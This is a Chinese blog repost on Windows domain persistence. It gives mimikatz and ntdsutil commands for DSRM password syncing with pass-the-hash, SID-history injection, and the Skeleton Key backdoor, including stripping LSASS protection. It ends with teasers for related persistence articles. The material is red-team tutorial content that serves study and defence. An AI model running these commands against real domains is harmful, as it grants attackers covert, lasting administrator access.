权限维持的几种方法

最新推荐文章于 2024-04-03 11:45:17 发布
最新推荐文章于 2024-04-03 11:45:17 发布
阅读量1.2k 收藏
点赞数
原文链接:http://www.cnblogs.com/KevinGeorge/p/10518731.html
版权

DSRM

每次修改都需要重置dsrm密码,本质上dsrm和administrator是一个账户。充值后,administrator的NTLMhash将变成你所掌握的账号的hash值,可以进行PtH

ntdsutil
set dsrm password
重置 DSRM 管理员密码:sync from domain account ACCOUNTNAME

1070321-20190312175928770-1668683126.png
证明hash值一样
1070321-20190312181418561-2059726460.png
1070321-20190312181450072-2145844554.png

sid-history

DomainA中的常规用户帐户可以包含DomainA 的SID,如果DomainA 的SID用于特权帐户或组,就可以授予常规用户帐户域管理员权限,而不需要成为域管理员组的成员。

PS>Get-AdUser -Properties SIDHistory,memberof
mimikatz#privilege::debug
mimikatz#sid::add /new:[DomainAdmin's SID or NAME] /sam:[CommonUserNAME]

如此即可使得CommonUserNAME具备DomainAdmins的SIDHistory,从而具备了权限,我的实验环境的确没有办法搞定最后一步,说是缺少权限,继续研究中ing
1070321-20190312185003947-1450586766.png

skeleton key(万能钥匙)

给域内所有账户增加一个密码,统一的,每一个域内账户都可以按照这个密码进行认证,其原理是对lsass.exe进行注入,所以重启后会失效

#没有lsass.exe保护的 
mimikatz#privilege::debug
mimikatz#misc::skeleton
#有lsass.exe保护的
"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa 新建-DWORD值,名称为RunAsPPL,数值为00000001就可以保护
"""
mimikatz#!+
mimikatz#!processprotect /process:lsass.exe /remove
mimikatz#misc::skeleton

1070321-20190313165603271-2097973605.png
默认的密码是mimikatz
1070321-20190313165941172-1536438793.png
1070321-20190313165844189-623356170.png

转载于:https://www.cnblogs.com/KevinGeorge/p/10518731.html

weixin_30345577
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
11种方法检测软件可靠性
03-23
安全性指与防止对程序及数据的非授权的故意或意外访问的能力有关的软件属性,可靠性指与在规定的一段时间和条件下,软件能维持其性能水平能力有关的一组属性。具体我  们可以从以下几个方面来判断:  1.用户权限...
渗透之权限维持的13种方法
include_voidmain的博客
08-04 1064
渗透之权限维持的13种方法
权限维持简单总结
Aiwin的博客
08-17 3838
权限维持简单总结
【神兵利器】后渗透-权限维持工具之HackerPermKeeper
最新发布
youmaob的博客
04-03 631
通过渗透拿到权限之后,为了不让权限丢失,都会进行权限维持,而在进行权限维持的时候,红队需要花费大量的时候,来验证是否合适,因此在这款工具就诞生 HackerPermKeeper[黑客权限保持者]OpenSSH后门万能密码&记录密码(这个需要依赖环境),就是把对方的门换个锁,但是原来的钥匙也可以使用。|| 越少,越难发现,但是部署起来,需要的依赖很多。ssh软链接&crontab。crontab后计划任务。发现程度:||||||发现程度:||||||发现程度:||||||发现程度:||||||
Windows权限维持方法
weixin_43722879的博客
08-15 453
Windows权限维持方法
Windows 权限维持手法
qq_53742230的博客
07-20 580
Windows 权限维持手法总结
权限维持
weixin_43999372的博客
05-28 1534
windows 权限维持 一 修改注册表建立隐藏用户 一.环境 windows 2007 CMD命令行下,建立了一个用户名为“test”,密码为test的用户,并加入管理员组,cMD命令行使用"netuser",看不到"test”,密码为test的用户,并加入管理员组 ,cMD命令行使用"net user
Z1-AggressorScripts:适用于Cobalt Strike的插件
04-30
权限维持模块新增创建自启动运行,包括添加注册表,添加启动文件夹,创建启动服务三种方式。 2020.11.20 更新: 内网穿透模块新增支持nps。 frp由之前的upx压缩版本换成未压缩版,upx压缩后的frp32位和nps都会在360...
计算机网络安全隐患及管理措施.docx
06-10
1主要的网络安全隐患 从目前的情况来看,计算机网络中存在的安全隐患主要包括以下几种。 1.1硬件设备安全隐患 维持网络畅通的硬件包括防火墙、路由器及交换机等,如硬件本身存在缺陷、工作环境或运行环境不良,给...
java 面试题 总结
09-16
继承是一种联结类的层次模型,并且允许和鼓励类的重用,它提供了一种明确表述共性的方法。对象的一个新类可以从现有的类中派生,这个过程称为类继承。新类继承了原始类的特性,新类称为原始类的派生类(子类),而...
超级有影响力霸气的Java面试题大全文档
07-18
 继承是一种联结类的层次模型,并且允许和鼓励类的重用,它提供了一种明确表述共性的方法。对象的一个新类可以从现有的类中派生,这个过程称为类继承。新类继承了原始类的特性,新类称为原始类的派生类(子类),而...
常见系统权限维持方法
weixin_62369433的博客
04-09 331
权限维持是黑客攻击中的一个重要环节,如果攻击者获得了系统管理员权限,就能够完全控制系统,进行各种恶意操作。
红队笔记之权限维持技术要点总结
明光札记
01-04 838
权限维持技术要点介绍
各种Window权限维持姿势合集
11-19 483
Pentestlab博客自10月1号开始,按照ATT&CK技术框架的持久性技术点,更新了一系列关于Window权限维持的文章,现在还在不断更新中。我认为这是一个非...
【内网安全】——Windows权限维持
Demo不是emo的博客
02-19 2802
Windows的权限维持姿势汇总
网络安全之权限维持(持续更新)
qq_52074678的博客
05-22 1741
权限维持 我们可以直接简单的把权限维持理解为我们在目标上安装了一个后门,权限维持的目的是保证自己的权限不会掉,一直控制目标。 渗透流程 Windows权限维持 1.用户维持 隐藏用户维持(影子用户) 隐藏账户,顾名思义就是计算机看不到的用户(不是不存在用户只是用一般的查看方式看不到) $符号隐藏用户 $符号隐藏用户就是在一个用户名后面加$符号,如(hack$)达到简单的隐藏用户目的,从而进行简单的权限维持 1.我们平时查看一个操作系统的几个用户的命令如下 net user.
Linux权限维持
duan_qiao925的博客
06-19 324
Linux权限维持与Windows权限维持一样,根本目的都是为了躲避管理员检测。 启动项和计划任务 常用方法如下: 通过修改“/etc/rc.local”来添加启动命令 将需要开机执行的脚本放置在“/etc/profile.d/”下,可实现开机启动。 将启动脚本链接到“/etc/rc.d/rc[0~6].d/”这几个目录下,0~6代表启动级别,0代表停止,1代表单用户模式,2~5代表多用户模式,6代表重启。 修改“/etc/crontab”文件添加定时执行的程序或脚本。 将启动脚本放置到“/etc/c.
windows权限维持
qq_46527080的博客
02-25 1146
windows权限维持一、添加影子账户二.nc自启动(需要一个nc程序)三、msf权限维持四、powshell权限维持 一、添加影子账户 1.首先常见一个影子账户(隐蔽的) net user chao1$ passwd /add 加入用户管理员组 net localgroup administrators chao1$ /add 2.打开注册表编辑器regedt32 打开HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users键值,然后找到admin对应的类型
Windows权限维持
谢公子的博客
05-28 2247
目录 创建隐蔽账号 进程迁移 启动目录 横向渗透 在红蓝对抗实战中,当我们获取到一台Windows主机的权限后,首先要做的就是怎么维持住该权限。因为防守方的实力也在不断增强,并且他们的流量监测设备也在不断监控,如果发现机器被植入木马,他们肯定会采取措施。 比如采取以下几点措施: 查杀木马进程 重启主机 断网 关闭主机 而对于我们维持权限,可以有以下几点: 创建隐蔽账号 如果目标主机的3389端口开放着,则我们可以创建隐蔽账号。 或者读取该主机administrator账号密码,使用
Linux权限维持有哪些方法
04-29
Linux权限维持方法有很多,其中一些常见的方法包括: 1. 提权攻击:攻击者利用系统中存在的漏洞获取root权限。 2. 密码猜测:攻击者通过猜测密码来获取用户的权限。 3. 社会工程学攻击:攻击者通过欺骗用户来...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值